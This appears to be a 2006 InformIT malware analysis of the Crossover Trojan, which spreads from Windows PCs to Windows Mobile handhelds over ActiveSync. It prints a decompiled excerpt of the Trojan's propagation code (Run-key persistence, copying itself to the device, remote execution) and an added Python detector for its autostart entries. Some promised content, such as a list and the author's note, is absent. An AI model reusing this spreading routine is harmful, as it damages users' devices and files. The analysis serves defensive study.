InformIT

Analyzing the Crossover Virus: The First PC to Windows Handheld Cross-infector

Date: Mar 8, 2006


"Airborne" mobile viruses have been increasing in complexity at a surprising pace. For example, there have already been blended Trojan and virus threats that can spread through Smartphones using multiple wireless protocols. This could be problematic, as current mobile devices cannot support sophisticated antivirus software on current platforms. In this article, Cyrus Peikari analyzes the new Crossover Trojan, which is the first malware that simultaneously infects both Windows PCs and Windows Mobile handheld devices.

Less than two years ago, the very first Pocket PC virus to appear (Dust) was incredibly complex. It achieved a technological breakthrough roughly equivalent to the Win32 Chernobyl virus, which was the first PC-based virus to break into the protected "Ring 0" of the Windows operating system.

Moreover, within a year after Dust's release, we saw numerous "blended" threats. For example, virus writers developed anti-antivirus trojans and have even combined these with the Bluetooth-spreading capability of the Carib (Cabir) virus. So in the space of one year, we saw a viral evolution equivalent to what took 20 years on desktop PCs.

One problem with this rapid evolution of threats is the fact that mobile devices can't support sophisticated antivirus software on current platforms. To give one example, embedded operating systems don't use "interrupts" (system calls to the kernel), so a heuristic virus scanner on the PDA or Smartphone can't hook a specific interrupt whose use it might otherwise treat as a sign of a virus.

In 2004 Seth Fogie and I co-wrote a rather controversial article on the Dust virus, which we were also the first to analyze. Parts 2 and 3 of that series were independent articles written by Ratter, a virus author from the group 29A. In them he explains that he has never released malware into the wild, and that he was providing the code simply as proof of concept. (For the record, Seth Fogie, my co-author on Part 1 of that series, was strongly against publishing that code.)

Publishing exploit code and source code is still controversial. For example, many commercial companies do not want flaws in their software revealed. However, time has shown that many companies will hide their flaws, to the detriment of the public, unless the actual exploit code is revealed.

In the general security community, it seems that the concept of "security through obscurity" has long been discredited. However, a small number of antivirus vendors are still strongly against re-publishing malware code in any form, even if it is already in the public domain (and readily accessible by anyone via free Internet download). Many of this small minority complained quite vocally. Part of this may be an emotional response. Many antivirus vendors and security firms are sensitive to repeated (although not proven) criticism that they occasionally hire virus writers and black-hat hackers. This may be why the Dust article hit a nerve.

To the credit of InformIT, they decided to publish the article anyway. However, we are respectful of everyone's feelings. We believe in freedom of the press, but we also believe that the press should take great care not to offend anyone, if at all possible. For this reason, we subsequently formed the Mobile Antivirus Researchers Association. This allowed us to share code and examples within a more strictly controlled environment of established researchers.

About the Mobile Antivirus Researchers Association (MARA)

MARA members are composed of antivirus companies, major security companies, CISSPs, university professors, and authors who have written some of the leading technical security books in the world. Members have to abide by a strict, written code of ethics. In fact, if you are interested in the field of mobile research and have the appropriate credentials, then we need you! We invite you to consider joining MARA at http://www.mobileav.org. Membership in MARA is free.

In addition, MARA provides samples of malware to antivirus vendors and other parties that have a legitimate research need. There is absolutely no requirement to become a MARA member. We are happy to provide samples even if you choose not to join MARA. In this case, we simply ask you to sign a mutual trading and ethics agreement. Trading malware is a sensitive business; for ethical and legal reasons there should be a written chain of custody. And if an antivirus vendor prefers not to use the MARA agreement, then they are welcome to suggest one that is to their liking.

Recently, we have seen a rapid evolution of "blended" mobile malware. Much of this activity has been seen on the Symbian Smartphone platform. For example, "Skulls" was the second trojan to infect Symbian Series 60 smart phones (the first was Mosquito). When launched, the application claims to be an "Extended Theme Manager by Tee-222." However, it then disables all other applications on the phone and replaces their icons with a skull and crossbones. Worse, it was more recently merged with Caribe to form the first "crossover" malware for Smartphones.

Skulls and Caribe also merged to form Metal Gear, a trojan that masquerades as the game of the same name. Metal Gear uses Skulls to deactivate the device's antivirus. Thus, it was the first anti-AV malware for Symbian phones. The malware also drops SEXXXY.sis to the device, an installer that adds code to disable the handset menu button. The Trojan then uses Caribe to transmit itself to new devices.

Another example of blending is the Gavno.a Trojan, which is spread via a file called patch.sis (it masquerades as a phone patch). Gavno uses a malformed file to crash an internal Symbian process, thus disabling the phone. The effect is to disable all handset buttons and to completely prevent the user from making calls. It may also cause a continual rebooting loop. It is only 2kb in size, and it has already seen variants merged with Caribe to spread to other phones.

Other examples of viral evolution include the following:

Lastly, a new Symbian Trojan called Doomboot-A now loads a Commwarrior variant when it infects Smartphones. Doomboot-A destroys the boot process so that the phone is not usable.

Cross-platform mobile malware

A newer development, and one that may be the most troubling, is the new breed of "cross-platform" mobile infectors. For example, the first mobile phone virus capable of infecting a PC was the Cardtrp worm. Cardtrp infects handsets running the Symbian 60 operating system and spreads via Bluetooth and MMS. If the phone has a memory card, it will drop the Win32 PC virus known as Wukill onto the card.

Conversely, the most recent type of malware does the opposite: it now cross-infects mobile devices from a PC. The first example of such malware, and the subject of this article, is a Trojan dubbed "crossover," which spreads from a Win32 desktop machine to a Windows Mobile Pocket PC handheld.

When executed from Win32, the Trojan checks what version the current OS is; if it is not Windows CE or Windows Mobile, the virus makes a copy of itself and puts a startup command in the registry key of local-machine-current-version-run. The trojan then quietly waits for an ActiveSync connection to be detected; it can wait indefinitely. When an ActiveSync connection is detected, the trojan automatically copies itself to the handheld device and remotely executes the trojan. The handheld device is now infected. The Trojan will then begin to delete documents on the handheld.

Crossover is the first known malware that can spread automatically from PC to Windows Mobile via an ActiveSync session. It was released to the Mobile Antivirus Researchers Association on February 23, 2006 by its author, who is an anonymous source. This is a live, working proof-of-concept (PoC) Trojan that infects both the host PC and ANY Windows Mobile device that connects via ActiveSync. To the best of our knowledge, at the time of this writing it is not in the wild, so it should not be considered an immediate threat.

Crossover is not a very malignant PoC. If this Trojan were to escape into the public, however, it would cause some damage to both the infected PC and PPC. In short, it will use up system resources and delete files found in the \My Documents directory on the PDA. However, infection is fairly easy to spot and just as easy to remove. This Trojan was not intended for stealth infections as its footprint quickly becomes obvious to the PDA user.

In addition to being able to transfer from the PC to the PDA, the crossover Trojan is also unique to the Windows Mobile world for another reason: the same binary can be executed both on the Pocket PC and on the PC. Internal logic determines the execution path and the resultant effects. In the following section we will describe the details of the Trojan.

On February 23, 2006, MARA received an email from an anonymous source. Included with the email was a single RAR'd file containing an executable named crossover-poc-vx.exe and a text file named cvx.txt. The contents of the txt file are included at the end of this article for your information.

We disassembled the Crossover malware and determined that it was written using the Microsoft .NET platform along with the OpenNETCF SDK that is available for download from http://www.opennetcf.org. In particular, OpenNETCF provides a Communication library that was heavily used to infect the PDA from the PC. According to our tests, any device or platform that supports the .NET and/or .NET CF framework will allow the crossover malware to execute.

Upon execution, the malware will first check to see what type of host operating system on which it resides. If the OS is not Windows CE or Windows Mobile, it will assume it is a desktop running some flavor of Windows. If the malware does not detect the mobile environment, it will make a copy of itself in the Windows folder and will add a registry entry pointing to the new file at HKLM\Software\Microsoft\Windows\CurrentVersion\Run to execute the new file each and every time the OS is rebooted. Then the executable goes into a loop until an ActiveSync connection is detected.

Note that each time the PC is rebooted, the crossover malware executables in the \Windows directory will execute, thus creating additional executables and registry entries. Eventually, enough copies of the malware will be running that the PC's performance and/or disk space will cause problems for the operator. There are no checks to see if the malware is already running or if the PC has been previously infected. New copies of the malware are created using random numbers (e.g., 925059734.exe).

Once an ActiveSync connection is detected, the malware copies itself over to the PDA and executes the new copy on the PDA from the PC via a CreateProcess function included with the OpenNETCF library. This newly executed copy detects the OS as being Windows CE or Mobile, and then deletes all files (not folders) in the \My Documents directory. It then copies itself to the \Windows directory on the PDA and creates a shortcut to that newly created executable in the \Windows\StartUp directory on the PDA. The result is that each time the PDA is rebooted, the Crossover malware copies are all executed, which then creates additional copies on the PDA. So even if the PDA user did not notice that their files were missing from the \My Documents directory, it would not take long for the PDA's system resources to be exhausted.
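As an added illustration (not part of the original article or of the Trojan's code), the following Python checks autostart entries for the drop pattern described above: a random-numbered .exe in the Windows folder, registered in the HKLM Run key on the PC or via a shortcut in \Windows\StartUp on the PDA. The sample entries, Run value names and shortcut names are constructed for the example.

```python
import re

# Indicator described in the article: a copy of the Trojan named with a random
# number (e.g. 925059734.exe) dropped into the Windows folder and registered to
# run at boot, on the PC through the HKLM ...\CurrentVersion\Run key and on the
# PDA through a shortcut in \Windows\StartUp.
RANDOM_NUMBERED_EXE = re.compile(r"^\d+\.exe$", re.IGNORECASE)
# Parent directory is <drive>:\Windows on the PC or \Windows on the PDA.
WINDOWS_DIR = re.compile(r"^(?:[a-z]:)?\\windows$", re.IGNORECASE)


def normalize_target(command):
    """Reduce an autostart command line to its executable path (quotes and arguments removed)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def find_crossover_indicators(entries):
    """entries: (source, command) pairs, where source names the Run value or StartUp
    shortcut and command is its target. Returns the (source, path) pairs whose
    target matches the Crossover drop pattern."""
    hits = []
    for source, command in entries:
        path = normalize_target(command).replace("/", "\\")
        parent, _, name = path.rpartition("\\")
        if WINDOWS_DIR.match(parent) and RANDOM_NUMBERED_EXE.match(name):
            hits.append((source, path))
    return hits


# Constructed sample data: value names and shortcut names are hypothetical,
# not taken from a real infected system.
RUN_KEY = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
SAMPLE_ENTRIES = [
    (RUN_KEY + "ctfmon", "C:\\WINDOWS\\system32\\ctfmon.exe"),          # legitimate PC entry
    (RUN_KEY + "925059734", "c:\\windows\\925059734.exe"),              # first Crossover copy
    (RUN_KEY + "1410065408", "\"c:\\windows\\1410065408.exe\""),        # copy added after a reboot
    ("\\Windows\\StartUp\\poutlook.lnk", "\\Windows\\poutlook.exe"),    # legitimate PDA entry
    ("\\Windows\\StartUp\\556993041.lnk", "\\Windows\\556993041.exe"),  # Crossover copy on the PDA
]

if __name__ == "__main__":
    for source, path in find_crossover_indicators(SAMPLE_ENTRIES):
        print(f"suspect autostart entry: {source} -> {path}")
```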

Testing was done on Windows Mobile 2002, 2003SE and Mobile 5 on three Pocket PC handhelds. The desktops used for testing were Windows XP and Windows Server 2003 in a VMWare environment. The testing was successful in all three cases, and the intended results were achieved. In Windows Mobile 2002, .NET CF 1.0 had to be manually installed because it does not have native support. In Mobile 2003SE and 5, .NET CF is natively supported and thus no modifications were needed. Some Windows Mobile 5 devices (e.g., the Dell Axim X51v) will require the user to allow the malware to execute thanks to its more stringent security settings. However, this added security is an OEM option and is often disabled by the user via a simple registry setting.

It should be noted that the malware is written in .NET, which is easily disassembled from binary back into source code using programs like Anakrino. The following is a short sample of the source code we obtained by disassembling the malware. Comments are included with the code.

      local1 = Environment.OSVersion.ToString();  // obtain current OS type
      local1 = local1.ToLower();                   // convert to lowercase
      local2 = local1.IndexOf("ce");               // position of "ce" in the OS string (-1 if absent)
      local3 = local1.IndexOf("mobile");           // position of "mobile" in the OS string (-1 if absent)
      if (local2 < 1 && local3 < 1) {              // neither "ce" nor "mobile" found: treat the host as a desktop PC
        try {
          local4 = new RAPI();                     // OpenNETCF remote API object used to talk to the PDA
          local5 = Assembly.GetExecutingAssembly().GetName().CodeBase;   // file:/// URI of this executable
          local5 = local5.Replace("/", "\\");
          local6 = local5.LastIndexOf("\\");
          local7 = local5.Substring(local6 + 1, local5.Length - local6 - 1);  // file name of this executable
          local5 = local5.Remove(0, 8);            // strip the 8-character "file:\\\" prefix left from the URI
          local5 = local5.Substring(0, local5.LastIndexOf("\\") + 1);        // directory of this executable
          local8 = local5 + local7;                // full path of this executable
          local9 = new FileInfo(local8);
          local10 = new Random();                  // create a random file name
          local11 = Convert.ToString(local10.Next()) + ".exe";
          local12 = "c:\\windows\\" + local11;     // include the path
          local13 = new AutoStartApps("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\");
                                                   // define the registry key
          local13.Add(local12);                    // add the new file to the Run key
          local4.Connect();                        // try to connect to the PDA
          while (!(local4.DevicePresent)) {        // continue looping until a PDA is present
            local4.Connect();                      // connect
          }
          local9.CopyTo(local12);                  // copy this executable to c:\windows\<random>.exe
          local14 = "\\Windows\\" + local11;       // define the destination on the PDA
          local4.CopyFileToDevice(local12, local14, true);  // copy the file to the PDA
          local4.CreateProcess(local14, "0");      // execute the file on the PDA
          local4.Disconnect();                     // disconnect
        }
        catch (Exception) {}                       // if there is an error, swallow the exception
      }

This is only part of the code, but you can see how easy it is to reverse-engineer the binary to learn what it is doing behind the scenes. The code provides clear evidence that the OpenNETCF library was used in the creation of the malware, as well as the Microsoft CF library.

Unlike Dust, Crossover does not require a complex exploit in the host operating system in order to succeed. Nevertheless, it is a significant step forward in mobile malware evolution. It also raises the question: will it be this easy for virus writers to port the tens of thousands of existing PC malware to smaller, handheld PDAs and phones? Let us pray not.
